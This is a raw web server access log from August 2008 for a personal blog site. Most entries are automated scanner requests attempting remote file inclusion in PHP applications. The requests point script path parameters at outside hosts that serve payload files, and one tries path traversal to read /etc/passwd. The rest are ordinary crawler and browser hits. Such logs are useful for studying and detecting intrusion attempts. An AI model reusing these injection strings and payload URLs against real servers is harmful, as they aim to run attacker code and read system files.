89.129.97.30 - - [18/Aug/2008:09:11:10 -0700] "GET /logs/access_080614.log%20/index.phpmain.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:11:29 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:11:29 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.31 - - [18/Aug/2008:09:11:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.31 - - [18/Aug/2008:09:11:43 -0700] "GET /plans/?M=A HTTP/1.1" 200 1111 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:11:47 -0700] "GET /logs//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:11:47 -0700] "GET //sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:12:13 -0700] "GET //codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:09:12:29 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0004.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:12:50 -0700] "GET /logs/access_080122.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:12:51 -0700] "GET /logs/access_080122.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:12:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:12:57 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:12:57 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:12:58 -0700] "GET /logs/access_080706.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:13:25 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:09:13:25 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.805" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:13:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:13:26 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:14:16 -0700] "GET /logs/access_080725.log//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:09:14:45 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:15:07 -0700] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:15:07 -0700] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:15:08 -0700] "GET /logs/access_080624.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:15:08 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:15:09 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:15:11 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:15:11 -0700] "GET //codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [18/Aug/2008:09:15:29 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dj-kelly.com/guestbook////log/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [18/Aug/2008:09:15:29 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dj-kelly.com/guestbook////log/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:16:01 -0700] "GET /logs/access_080225.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:16:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:16:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:16:44 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:39 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:41 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.39 - - [18/Aug/2008:09:17:48 -0700] "GET /blog HTTP/1.1" 301 85 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:17:50 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:17:50 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:17:50 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:52 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:55 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:17:57 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:18:02 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:18:04 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:18:06 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:18:14 -0700] "GET /logs/access_080713.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:09:18:15 -0700] "GET //modules/vwar/admin/errors.php?error=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:18:18 -0700] "GET /logs/access_080606.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:18:43 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.22.44.250 - - [18/Aug/2008:09:18:55 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.22.44.250 - - [18/Aug/2008:09:18:56 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.22.44.250 - - [18/Aug/2008:09:18:56 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:19:18 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:19:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:19:21 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.154.65 - - [18/Aug/2008:09:19:22 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:09:20:01 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:09:20:01 -0700] "GET /logs/access_080630.log/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:09:20:01 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.39 - - [18/Aug/2008:09:20:12 -0700] "GET /blog/ HTTP/1.1" 200 10827 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:20:25 -0700] "GET /logs/access_080309.log//?custompluginfile[]=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [18/Aug/2008:09:20:25 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:20:25 -0700] "GET /logs/access_080215.log//?custompluginfile[]=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:20:25 -0700] "GET /logs//?custompluginfile[]=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:09:20:26 -0700] "GET //?custompluginfile[]=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 200 11022 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [18/Aug/2008:09:20:28 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:20:29 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.22.44.250 - - [18/Aug/2008:09:20:32 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:20:32 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:20:36 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.177.97.237 - - [18/Aug/2008:09:20:37 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:20:39 -0700] "GET /logs/access_080131.log%20/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:43 -0700] "GET /logs/access_080724.log//include/admin.php?rd=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:43 -0700] "GET //include/admin.php?rd=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:44 -0700] "GET /logs//include/admin.php?rd=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:52 -0700] "GET /logs/access_080724.log//include/admin.php?rd=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:52 -0700] "GET /logs//include/admin.php?rd=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:20:52 -0700] "GET //include/admin.php?rd=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:21:00 -0700] "GET /logs/access_080724.log//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:21:00 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:21:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:09:21:19 -0700] "GET /logs/access_080630.log/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:09:21:19 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:21:22 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET / HTTP/1.1" 200 10821 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:36 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:36 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:36 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:36 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&38 HTTP/1.1" 200 3451 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:36 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1009.jpg HTTP/1.1" 200 366579 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:38 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&796 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:21:38 -0700] "GET /logs/access_080809.log//include/admin.php?rd=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 200 386583 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:21:40 -0700] "GET /logs/access_080809.log//include/admin.php?rd=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:21:47 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:21:48 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:49 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1013.jpg HTTP/1.1" 200 340617 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
